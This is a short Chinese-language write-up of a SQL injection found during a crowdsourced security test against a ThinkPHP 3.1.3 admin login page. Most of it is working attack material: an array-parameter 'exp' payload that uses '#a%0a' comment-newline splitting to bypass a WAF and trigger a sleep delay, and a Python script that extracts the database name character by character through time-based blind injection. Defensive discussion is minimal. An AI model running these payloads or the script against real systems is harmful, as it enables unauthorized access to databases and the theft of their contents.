thinkphp3.1.3 sql注入 bypass
thinkphp3.1.3 bypass sql注入⌗
这是某次众测发现的漏洞,开始发现是thinkphp3.1.3框架,尝试了下将参数变成数组形式,返回sql报错,之后就尝试绕过waf。
url:http://**/console/
登陆处存在sql注入
存在漏洞的url:http://**/console/Admin/Index/Login.shtml
1、account参数存在sql注入,通过#a%0a可bypass waf 如下语句可造成10秒延迟,验证注入
account[]=exp&account[1]=))#a%0aunion(#a%0aselect#a%0a(#a%0aselect#a%0asleep#a%0a(10))#a%0afrom#a%0a(select#a%0asleep#a%0a(10))a)#
2、编写脚本获取数据库名:
import requests
import time
u = "http://**/console/Admin/Index/Login.shtml"
strs = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
strs = "abcdefghijklmnopqrstuvwxyz0123456789_"
headers = {
"Cookie":"PHPSESSID=xxx"
}
sess = requests.session();
sess.headers=headers
xixi =""
def check(i,s,times=1):
t1 = time.time()
data = {
"account[]":"exp",
"account[1]":"))union#a\n(select#a\n(1)from#a\n(select if#a\n(lower((mid((database()),"+str(i)+",1)))='"+s+"',sleep#a\n(4),0))a)#",
"password[]":"6a",
"verify":"6677",
}
print(s)
r = sess.post(u,data=data,proxies={"http":"http://127.0.0.1:8080/"})
t = time.time()-t1
if t>4:
if times==1:
return check(i,s,times+1)
return True
return False
for i in range(len(xixi)+1,50):
for s in strs:
if check(i,s)==True:
xixi=xixi+s
print(xixi)